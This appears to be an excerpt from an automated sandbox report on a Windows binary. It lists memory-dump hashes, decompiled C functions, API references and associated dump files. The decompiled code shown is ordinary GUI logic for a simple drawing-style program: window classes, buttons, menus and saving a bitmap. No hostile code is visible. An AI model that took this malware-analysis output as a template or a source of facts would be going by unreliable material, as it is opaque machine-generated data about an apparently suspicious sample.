                                              • Opcode Fuzzy Hash: 515cbd1d688cb2e24db0e980ba2879dfe6454d645799f915690ef55488c76b10
                                              • Instruction Fuzzy Hash: 9B318FB1A00308BAEB10EFA1DC82FFEB3B8AF85714F00451EF515A7242E779595187AD
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.744663875.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2379e49ccd2abb7d4460b415da91cf2f25e72e5050ebd7d99632e8663e26f751
                                              • Instruction ID: e697e7aebe332b01f8eb278df54031ee1d05430c2d5280181dd025482a47c36b
                                              • Opcode Fuzzy Hash: 2379e49ccd2abb7d4460b415da91cf2f25e72e5050ebd7d99632e8663e26f751
                                              • Instruction Fuzzy Hash: 3FC08C3290A06089A7029E88B2980B0EB74E483122B0022A7C90A2B4028008C009C349
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f0d764d71c0c3e06c81e4cad75e65ad3e38ebfe79b1c94f5463c68e5524ed222
                                              • Instruction ID: 019b637a3a96ae8a97111abd8e0ef4187801ec3d097a5612eff5f490607ec59e
                                              • Opcode Fuzzy Hash: f0d764d71c0c3e06c81e4cad75e65ad3e38ebfe79b1c94f5463c68e5524ed222
                                              • Instruction Fuzzy Hash: C29002A121100042D10471998404B061046A7E1341F51C112E3148668CC5698D656165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 25aabe7704a035536a6b9cdf9d6767313488dfab3682de88c9b95c13e1f64074
                                              • Instruction ID: 3536b070d9ffdfc7c212d95d11a694bab670a1d86dd276c52fbf09c50153c577
                                              • Opcode Fuzzy Hash: 25aabe7704a035536a6b9cdf9d6767313488dfab3682de88c9b95c13e1f64074
                                              • Instruction Fuzzy Hash: F390027120100802D10471998804A861006A7D0341F51C111E7018769ED6A589957171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 23e212800c91544aec4a8df8a9c57d03e4fcf567531e950ad867b9c1f14fc1d8
                                              • Instruction ID: 74c674529d9c2c24c2caa4b922e759d5280d473d2c2592c211c170ece78fabea
                                              • Opcode Fuzzy Hash: 23e212800c91544aec4a8df8a9c57d03e4fcf567531e950ad867b9c1f14fc1d8
                                              • Instruction Fuzzy Hash: 109002E1201140924500B299C404F0A5506A7E0341B51C116E2048674CC5658955A175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 735b03fc5cbcbd5f9a75bc000a30a2c8b8d92dfce6efd4befdcee91ae1dcbea8
                                              • Instruction ID: 5ab047cbefb282789656826a988360a037c722fd590557224b4d6532c2b4e691
                                              • Opcode Fuzzy Hash: 735b03fc5cbcbd5f9a75bc000a30a2c8b8d92dfce6efd4befdcee91ae1dcbea8
                                              • Instruction Fuzzy Hash: 21900271A0500012914071998814A465007B7E0781B55C111E1508668CC9948B5963E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9681a0fd5b09bc94007560e86a833e900da6eed0da73b94aacf78cf353267e10
                                              • Instruction ID: 93904ecdaab2a6f03f860ca7568498172da0ae132d499dc8d98eb2fc07eb5157
                                              • Opcode Fuzzy Hash: 9681a0fd5b09bc94007560e86a833e900da6eed0da73b94aacf78cf353267e10
                                              • Instruction Fuzzy Hash: DF9002A120140403D14075998804A071006A7D0342F51C111E3058669ECA698D557175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 33d177281954ad82a62da2fb69b59d613301415f76d84c7cdeb8efb82efae700
                                              • Instruction ID: 85deb8b43a04ff192466d4bf55fc78167941550b94488e2393c7d4b39f511986
                                              • Opcode Fuzzy Hash: 33d177281954ad82a62da2fb69b59d613301415f76d84c7cdeb8efb82efae700
                                              • Instruction Fuzzy Hash: 88900265221000020145B599460490B1446B7D6391391C115F240A6A4CC66189696361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 37d43daeae45e85de1998b18e85a72e39f7fd9b6e201205c08c164487b031acb
                                              • Instruction ID: c789fe835ed7c6055c8e5d09b9d377dc951e74c69871be017216d3ef73e22160
                                              • Opcode Fuzzy Hash: 37d43daeae45e85de1998b18e85a72e39f7fd9b6e201205c08c164487b031acb
                                              • Instruction Fuzzy Hash: A490026130100402D10271998414A06100AE7D1385F91C112E2418669DC6658A57B172
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3032f117b8332c69923d573d192d5e6a93173cb7a0113ae0070c47d54da6109f
                                              • Instruction ID: cf942c85eb6996d931d597cd6f3a80bf78851b0b181c312068a8c50db1516d75
                                              • Opcode Fuzzy Hash: 3032f117b8332c69923d573d192d5e6a93173cb7a0113ae0070c47d54da6109f
                                              • Instruction Fuzzy Hash: 2290027124100402D14171998404A06100AB7D0381F91C112E1418668EC6958B5ABAA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ba2bf841d381854de968d763b9b90b7f950666956ed7bca99fa4c129c278b6e8
                                              • Instruction ID: c3b0c518eb6e884d1d8aa5d6c8fa6c862f44f371c6c42c107750c2b6e61aa40b
                                              • Opcode Fuzzy Hash: ba2bf841d381854de968d763b9b90b7f950666956ed7bca99fa4c129c278b6e8
                                              • Instruction Fuzzy Hash: F19002A1601140434540B19988048066016B7E1341391C221E1448674CC6A88959A2A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 04a63e3cec9e243e31fafc3b495dc8debb21824d04f5f393023b58fd75b64733
                                              • Instruction ID: 823e72626ca10648bb0f7473d48ced51f7e2e0ff173af61cbde1af92ada88ac8
                                              • Opcode Fuzzy Hash: 04a63e3cec9e243e31fafc3b495dc8debb21824d04f5f393023b58fd75b64733
                                              • Instruction Fuzzy Hash: D590027120144002D1407199C444A0B6006B7E0341F51C511E1419668CC655895AA261
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a0df984baa2bbfcc7d614cc7827065916b2fb21aa5c39fdee40e4bdcafb854cf
                                              • Instruction ID: 7f522788c1cacc601abbfd84a2b1699a9235e421586dbad39df35e28ca9f622b
                                              • Opcode Fuzzy Hash: a0df984baa2bbfcc7d614cc7827065916b2fb21aa5c39fdee40e4bdcafb854cf
                                              • Instruction Fuzzy Hash: 0690026124100802D1407199C414B071007E7D0741F51C111E1018668DC6568A6976F1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e376f3b45e29f99ddfaeea2dbf62aa70fd0d78284b4e2ee31ae7b15d95928933
                                              • Instruction ID: b15f28d7814400ef1fae817816f0538f350c3a2995c418bd4a4672605f606b0f
                                              • Opcode Fuzzy Hash: e376f3b45e29f99ddfaeea2dbf62aa70fd0d78284b4e2ee31ae7b15d95928933
                                              • Instruction Fuzzy Hash: 68900271301000529500B6D99804E4A5106A7F0341B51D115E5008668CC59489656161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d121f989ae1949e6c542f6b3717890e064012c5e58726498ace0487cbe21c715
                                              • Instruction ID: 98ba5f9a71aa8284f8b55b39d14cc5953ee003e1876d732cfa7485c411cd6b2e
                                              • Opcode Fuzzy Hash: d121f989ae1949e6c542f6b3717890e064012c5e58726498ace0487cbe21c715
                                              • Instruction Fuzzy Hash: 5490026160500402D14071999418B061016A7D0341F51D111E1018668DC6998B5976E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4d0a90b593267f42f29ca1550db1472028e9909fe65f8226e7e1a961e3992226
                                              • Instruction ID: 51e0bb42af892c93c96ead7af9d9368af1cfb35eca6efa30c32b935a8683cfe3
                                              • Opcode Fuzzy Hash: 4d0a90b593267f42f29ca1550db1472028e9909fe65f8226e7e1a961e3992226
                                              • Instruction Fuzzy Hash: 2090027120100403D10071999508B071006A7D0341F51D511E141866CDD69689557161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 363ed10808bce3c06961de02a1bc74a0875adaf2a9945dd7ee9f4fafd4ef98f8
                                              • Instruction ID: 042c412a8fe99a69c682f254f2018f0fea1c2b2c2d4932910e79a542fef976eb
                                              • Opcode Fuzzy Hash: 363ed10808bce3c06961de02a1bc74a0875adaf2a9945dd7ee9f4fafd4ef98f8
                                              • Instruction Fuzzy Hash: 9590026120504442D10075999408E061006A7D0345F51D111E20586A9DC6758955B171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc530121e7777367c632995ea79a8320ea7a307a46d4085f4d87a5ab2e9f40d4
                                              • Instruction ID: 0e632e5b0bdea82a8106aad45b3e43b1175a376e0c371628e7e3dd51d0b8a527
                                              • Opcode Fuzzy Hash: fc530121e7777367c632995ea79a8320ea7a307a46d4085f4d87a5ab2e9f40d4
                                              • Instruction Fuzzy Hash: C290027520504442D50075999804E871006A7D0345F51D511E14186ACDC6948965B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76da52fddc6a3a6e5e3c9288aa82e83e821fb81099aeb71e1b6e1aa2f308bbd9
                                              • Instruction ID: 9fca7300125f0021df9111a5f33061a138e7fd27d7e40248db88624fc324bd1e
                                              • Opcode Fuzzy Hash: 76da52fddc6a3a6e5e3c9288aa82e83e821fb81099aeb71e1b6e1aa2f308bbd9
                                              • Instruction Fuzzy Hash: 2190026120144442D14072998804F0F5106A7E1342F91C119E514A668CC95589596761
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e955204ecdf58d390eac8771f0ca43aae290b757de30a2d7fc1d1c60facd4ef8
                                              • Instruction ID: 57b4ecc3c0595f4f574fa969f45a0c6d87c6dd3f44830b0fd8b5ef563ecb1d50
                                              • Opcode Fuzzy Hash: e955204ecdf58d390eac8771f0ca43aae290b757de30a2d7fc1d1c60facd4ef8
                                              • Instruction Fuzzy Hash: 6B90027120100842D10071998404F461006A7E0341F51C116E1118768DC655C9557561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: db138bd58840140e7868cac20a20728958bf0babf11d19cf471ac70109258fb6
                                              • Instruction ID: 4b8506339fce9029247c9bc374970b4b2352a17b912782e3c059b64988619a28
                                              • Opcode Fuzzy Hash: db138bd58840140e7868cac20a20728958bf0babf11d19cf471ac70109258fb6
                                              • Instruction Fuzzy Hash: 3C90027160500802D15071998414B461006A7D0341F51C111E1018768DC7958B5976E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1838f7acd7136aee9f51a45df192c3e6c634f3bf3b56ed3216ae78c8a90939ca
                                              • Instruction ID: cb23e46c04735034ee3fba3812199eab6d610ab404ea7232b2c4931e80dd8b58
                                              • Opcode Fuzzy Hash: 1838f7acd7136aee9f51a45df192c3e6c634f3bf3b56ed3216ae78c8a90939ca
                                              • Instruction Fuzzy Hash: B090027120140402D10071998808B471006A7D0342F51C111E6158669EC6A5C9957571
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 94c34a1bf2f0ed0914eee3c9eac2dbfc165b612af94abc2de95870b946d10d5b
                                              • Instruction ID: 59365fd1711ac32a5a20f8826fea6dbccb153bf847d90c1072e80355ede7805b
                                              • Opcode Fuzzy Hash: 94c34a1bf2f0ed0914eee3c9eac2dbfc165b612af94abc2de95870b946d10d5b
                                              • Instruction Fuzzy Hash: A790027120504842D14071998404E461016A7D0345F51C111E10587A8DD6658E59B6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Memory Dump Source
                                              • Source File: 00000002.00000002.745274685.0000000001810000.00000040.00000001.sdmp, Offset: 01810000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction ID: d975ec5fa384de7cd888f7d5195238c3e9466ff9fe64a4044f93480bd68a8d66
                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC670(char _a4, intOrPtr* _a8, intOrPtr* _a12) {
                                              				int _v8;
                                              				struct _WNDCLASSW _v48;
                                              				struct _WNDCLASSW _v88;
                                              
                                              				_v48.style = 0;
                                              				_v48.lpfnWndProc = 0;
                                              				_v48.cbClsExtra = 0;
                                              				_v48.cbWndExtra = 0;
                                              				_v48.hInstance = 0;
                                              				_v48.hIcon = 0;
                                              				_v48.hCursor = 0;
                                              				_v48.hbrBackground = 0;
                                              				_v48.lpszMenuName = 0;
                                              				_v48.lpszClassName = 0;
                                              				_v48.lpszClassName = L"Panel";
                                              				_v48.hbrBackground = GetStockObject(0);
                                              				_v48.lpfnWndProc = E002FCD70;
                                              				RegisterClassW( &_v48);
                                              				_v88.style = 0;
                                              				_v88.lpfnWndProc = 0;
                                              				_v88.cbClsExtra = 0;
                                              				_v88.cbWndExtra = 0;
                                              				_v88.hInstance = 0;
                                              				_v88.hIcon = 0;
                                              				_v88.hCursor = 0;
                                              				_v88.hbrBackground = 0;
                                              				_v88.lpszMenuName = 0;
                                              				_v88.lpszClassName = 0;
                                              				_v88.lpszClassName = L"Paper";
                                              				_v88.hbrBackground = GetStockObject(0);
                                              				_v88.lpfnWndProc = E002FCE30;
                                              				RegisterClassW( &_v88);
                                              				_v8 = 0xa;
                                              				_t30 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", "P", 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t30, 1, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				_t34 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", "S", 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t34, 2, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				_t38 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", "L", 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t38, 3, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				_t42 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", "R", 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t42, 4, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				_t46 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", L"Ci", 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t46, 5, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				_t50 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", "F", 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t50, 6, 0, 0);
                                              				_v8 = _v8 + 0x1e;
                                              				_t54 =  &_a4; // 0x304860
                                              				 *_a8 = CreateWindowExW(0, L"Panel", 0, 0x50000000, 0xa, _v8, 0x19, 0x19,  *_t54, 0, 0, 0);
                                              				_t57 =  &_a4; // 0x304860
                                              				 *_a12 = CreateWindowExW(0, L"Paper", 0, 0x50000000, 0x32, 0xa, 0x1f4, 0x15e,  *_t57, 0, 0, 0);
                                              				_t59 =  &_a4; // 0x304860
                                              				CreateWindowExW(0, L"Button", "<", 0x50000000, 0x32, 0x172, 0x19, 0x19,  *_t59, 7, 0, 0);
                                              				_t60 =  &_a4; // 0x304860
                                              				return CreateWindowExW(0, L"Button", ">", 0x50000000, 0x50, 0x172, 0x19, 0x19,  *_t60, 8, 0, 0);
                                              			}






                                              0x002fc676
                                              0x002fc67f
                                              0x002fc682
                                              0x002fc685
                                              0x002fc688
                                              0x002fc68b
                                              0x002fc68e
                                              0x002fc691
                                              0x002fc694
                                              0x002fc697
                                              0x002fc69a
                                              0x002fc6a9
                                              0x002fc6ac
                                              0x002fc6b7
                                              0x002fc6bd
                                              0x002fc6c6
                                              0x002fc6c9
                                              0x002fc6cc
                                              0x002fc6cf
                                              0x002fc6d2
                                              0x002fc6d5
                                              0x002fc6d8
                                              0x002fc6db
                                              0x002fc6de
                                              0x002fc6e1
                                              0x002fc6f0
                                              0x002fc6f3
                                              0x002fc6fe
                                              0x002fc704
                                              0x002fc711
                                              0x002fc730
                                              0x002fc73c
                                              0x002fc745
                                              0x002fc764
                                              0x002fc770
                                              0x002fc779
                                              0x002fc798
                                              0x002fc7a4
                                              0x002fc7ad
                                              0x002fc7cc
                                              0x002fc7d8
                                              0x002fc7e1
                                              0x002fc800
                                              0x002fc80c
                                              0x002fc815
                                              0x002fc834
                                              0x002fc840
                                              0x002fc849
                                              0x002fc86e
                                              0x002fc876
                                              0x002fc89f
                                              0x002fc8a7
                                              0x002fc8c7
                                              0x002fc8d3
                                              0x002fc8fc

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: CreateWindow$ClassObjectRegisterStock
                                              • String ID: Button$Button$Button$Button$Button$Button$Button$Button$Panel$Paper$`H0$`H0$lH0
                                              • API String ID: 3256756162-2307794220
                                              • Opcode ID: b244ee4955badfd3ea15da68f666ac0b3f861633c72cbfa5cbd3c625bfc10c3a
                                              • Instruction ID: 424faa7f9534653367afee9729ea1560f13470f27dd87e2b3161a5a5f9d683d7
                                              • Opcode Fuzzy Hash: b244ee4955badfd3ea15da68f666ac0b3f861633c72cbfa5cbd3c625bfc10c3a
                                              • Instruction Fuzzy Hash: F281ECB4B80348BFFB11CF95DC56FAE7AB1AB48B05F208119F704BA2D0D6F16A009B54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FD400(void* __edi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                              				struct HDC__* _v8;
                                              				struct HDC__* _v12;
                                              				int _v16;
                                              				struct HBITMAP__* _v20;
                                              				void* _v24;
                                              				int _v28;
                                              				intOrPtr _v56;
                                              				intOrPtr _v68;
                                              				intOrPtr _v84;
                                              				char* _v88;
                                              				WCHAR* _v104;
                                              				struct HWND__* _v112;
                                              				struct tagOFNA _v116;
                                              				char _v634;
                                              				char _v636;
                                              
                                              				_t86 = __edi;
                                              				_v636 =  *0x30593c;
                                              				E002F1D00(__edi,  &_v634, 0, 0x206);
                                              				_v28 = 0;
                                              				_v16 = _a8;
                                              				if(_v16 == 1) {
                                              					CreateWindowExW(0, L"button", 0x304ad8, 0x50000000, 5, 5, 0x4b, 0x19, _a4, 1, 0, 0);
                                              				} else {
                                              					if(_v16 == 0x10) {
                                              						DestroyWindow(_a4);
                                              					} else {
                                              						if(_v16 == 0x111) {
                                              							_v8 = GetDC( *0x3059b4);
                                              							_v12 = CreateCompatibleDC(_v8);
                                              							_v20 = CreateCompatibleBitmap(_v8, 0x1f4, 0x15e);
                                              							_v24 = SelectObject(_v12, _v20);
                                              							BitBlt(_v12, 0, 0, 0x1f4, 0x15e, _v8, 0, 0, 0xcc0020);
                                              							SelectObject(_v12, _v24);
                                              							DeleteObject(_v8);
                                              							DeleteObject(_v12);
                                              							E002F1D00(_t86,  &_v116, 0, 0x58);
                                              							_v116 = 0x58;
                                              							_v112 = _a4;
                                              							_v104 = L"Bmp File(*Bmp)";
                                              							_v88 =  &_v636;
                                              							_v84 = 0x104;
                                              							_v56 = 0x304b34;
                                              							_v68 = 0x304b40;
                                              							if(GetOpenFileNameW( &_v116) != 0) {
                                              								E002FB350(_v20, _v88);
                                              							}
                                              							DeleteObject(_v20);
                                              						}
                                              					}
                                              				}
                                              				return DefWindowProcW(_a4, _a8, _a12, _a16);
                                              			}


















                                              0x002fd400
                                              0x002fd40f
                                              0x002fd424
                                              0x002fd42c
                                              0x002fd436
                                              0x002fd43d
                                              0x002fd47a
                                              0x002fd43f
                                              0x002fd443
                                              0x002fd57e
                                              0x002fd449
                                              0x002fd450
                                              0x002fd492
                                              0x002fd49f
                                              0x002fd4b6
                                              0x002fd4c7
                                              0x002fd4e9
                                              0x002fd4f7
                                              0x002fd501
                                              0x002fd50b
                                              0x002fd519
                                              0x002fd521
                                              0x002fd52b
                                              0x002fd52e
                                              0x002fd53b
                                              0x002fd53e
                                              0x002fd545
                                              0x002fd54c
                                              0x002fd55f
                                              0x002fd569
                                              0x002fd569
                                              0x002fd572
                                              0x002fd572
                                              0x002fd450
                                              0x002fd443
                                              0x002fd59d

                                              APIs
                                              • CreateWindowExW.USER32 ref: 002FD47A
                                              • GetDC.USER32(?), ref: 002FD48C
                                              • CreateCompatibleDC.GDI32(?), ref: 002FD499
                                              • CreateCompatibleBitmap.GDI32(?,000001F4,0000015E), ref: 002FD4B0
                                              • SelectObject.GDI32(?,?), ref: 002FD4C1
                                              • BitBlt.GDI32(?,00000000,00000000,000001F4,0000015E,?,00000000,00000000,00CC0020), ref: 002FD4E9
                                              • SelectObject.GDI32(?,?), ref: 002FD4F7
                                              • DeleteObject.GDI32(?), ref: 002FD501
                                              • DeleteObject.GDI32(?), ref: 002FD50B
                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 002FD557
                                              • DeleteObject.GDI32(?), ref: 002FD572
                                              • DestroyWindow.USER32(?), ref: 002FD57E
                                              • DefWindowProcW.USER32(?,00000001,?,?), ref: 002FD594
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp Download File
                                              Similarity
                                              • API ID: Object$CreateDeleteWindow$CompatibleSelect$BitmapDestroyFileNameOpenProc
                                              • String ID: 4K0$@K0$X$button
                                              • API String ID: 2517243105-1100839627
                                              • Opcode ID: 8e351130efeec61648f2ed0fbb18562ae1848318521fafc9f96196b05ed8b7a4
                                              • Instruction ID: c10537d6c6a7636b83f40705adc118003bd9f99f614a95a35bcade4454d79bf8
                                              • Opcode Fuzzy Hash: 8e351130efeec61648f2ed0fbb18562ae1848318521fafc9f96196b05ed8b7a4
                                              • Instruction Fuzzy Hash: C7410AB5A50208EBDB14DFA0DC59FBEB7B5AB48741F108528FB05AB290DBB59A00CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002FC900(struct HWND__* _a4) {
                                              				struct HMENU__* _v8;
                                              				struct HMENU__* _v12;
                                              				struct HMENU__* _v16;
                                              				struct HMENU__* _v20;
                                              
                                              				_v16 = CreateMenu();
                                              				_v20 = CreateMenu();
                                              				_v8 = CreateMenu();
                                              				_v12 = CreateMenu();
                                              				AppendMenuW(_v20, 0, 0xa, 0x304780);
                                              				AppendMenuW(_v20, 0, 0xb, 0x30478c);
                                              				AppendMenuW(_v8, 0, 0xc, 0x304798);
                                              				AppendMenuW(_v8, 0, 0xd, 0x3047ac);
                                              				AppendMenuW(_v8, 0, 0xe, 0x3047c0);
                                              				AppendMenuW(_v8, 0x800, 0, 0);
                                              				AppendMenuW(_v8, 0, 1, 0x3047cc);
                                              				AppendMenuW(_v8, 0, 1, 0x3047dc);
                                              				AppendMenuW(_v12, 0, 3, 0x3047f0);
                                              				AppendMenuW(_v12, 0, 1, 0x304808);
                                              				AppendMenuW(_v12, 0, 0xf, 0x304818);
                                              				AppendMenuW(_v16, 0x10, _v20, 0x30482c);
                                              				AppendMenuW(_v16, 0x10, _v12, 0x304838);
                                              				AppendMenuW(_v16, 0x10, _v8, 0x304848);
                                              				return SetMenu(_a4, _v16);
                                              			}







                                              0x002fc90c
                                              0x002fc915
                                              0x002fc91e
                                              0x002fc927
                                              0x002fc937
                                              0x002fc94a
                                              0x002fc95d
                                              0x002fc970
                                              0x002fc983
                                              0x002fc996
                                              0x002fc9a9
                                              0x002fc9bc
                                              0x002fc9cf
                                              0x002fc9e2
                                              0x002fc9f5
                                              0x002fca0a
                                              0x002fca1f
                                              0x002fca34
                                              0x002fca4b

                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
                                              • Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp Download File
                                              • Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp Download File
